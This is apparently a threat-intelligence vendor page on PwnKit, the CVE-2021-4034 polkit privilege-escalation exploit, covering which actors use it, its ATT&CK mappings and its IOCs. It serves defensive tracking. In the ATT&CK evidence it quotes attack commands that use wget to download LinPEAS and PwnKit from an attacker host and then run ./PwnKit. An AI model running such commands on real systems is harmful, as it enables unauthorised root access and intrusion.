MalwareUsed by 2 actorsExploits 1 CVE

PwnKit

PwnKit is a self-contained exploit for CVE-2021-4034 used to achieve local privilege escalation on Linux systems. In the provided reporting, it was deployed post-compromise by multiple intrusion clusters as part of broader intrusion toolchains rather than as an initial access vector. Unit 42 observed Chinese-linked cluster CL-UNK-1068 using PwnKit for Linux privilege escalation during cyberespionage-oriented intrusions targeting high-value organizations across South, Southeast, and East Asia, including government, critical infrastructure, technology, telecommunications, aviation, energy, law enforcement, and pharmaceutical sectors. Unit 42 also reported use of PwnKit by cluster CL-STA-0969 in 2024 against telecommunications providers in Southwest Asia, where the actor likely gained initial access via SSH brute force and then used PwnKit, DirtyCoW, and sudo Baron Samedit for privilege escalation. In that activity, CL-STA-0969 overlapped with activity attributed to Liminal Panda and showed tooling overlaps with Light Basin and several UNC clusters. The content explicitly identifies PwnKit as Linux privilege-escalation tooling and notes that Unit 42 published SHA-256 IOCs for PwnKit among other tools associated with CL-STA-0969.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES

CVE-2021-4034PwnKit local privilege escalation in polkit pkexec

“The threat actor used PwnKit, a self-contained exploit for CVE-2021-4034.”

via palo alto networks unit 42 blogunit42.paloaltonetworks.com

THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Liminal Panda

“The threat actor used PwnKit, a self-contained exploit for CVE-2021-4034.”

via palo alto networks unit 42 blogunit42.paloaltonetworks.com

CL-UNK-1068

“Attackers deployed PwnKit, a self-contained exploit (CVE-2021-4034) to achieve local privilege escalation on Linux systems.”

via palo alto networks unit 42 blogunit42.paloaltonetworks.com

MITRE ATT&CK

Techniques & procedures

3 distinct techniques documented for this family, organized by ATT&CK tactic.

Privilege Escalation

1 technique

T1068Exploitation for Privilege EscalationEvidence3

Vector 4 — PwnKit (CVE-2021–4034) ... It allows any unprivileged local user to escalate to root ... ./PwnKit

Stealth

1 technique

T1027Obfuscated Files or InformationEvidence1

Base64-encoded payloads including chisel.b64 , pwnkit_b64 , neo.jspx.b64 and payload.b64 ; chunked ELF binary delivery; AES-encrypted Neo-reGeorg webshell channel; custom Base64 alphabet.

Command and Control

1 technique

T1105Ingress Tool TransferEvidence1

With a stable shell, I transferred LinPEAS to the target using a Python HTTP server ... wget http://192.168.100.199/linpeas.sh ... On the target ... wget http://192.168.100.199/PwnKit

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Hashes

1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting

hash.sha256●●●●●●●●●●●●View more in app11 months ago

ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app

palo alto networks unit 42 blogNews

Mar 6, 2026

An Investigation Into Years of Undetected Operations Targeting High-Value Sectors

Local privilege escalation exploit for Linux (polkit pkexec) used to obtain root-level execution.

palo alto networks unit 42 blogNews

Jul 29, 2025

The Covert Operator's Playbook: Infiltration of Global Telecom Networks

Local privilege escalation exploit for Polkit pkexec (CVE-2021-4034) used to obtain root on Linux systems.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching1

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping3

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.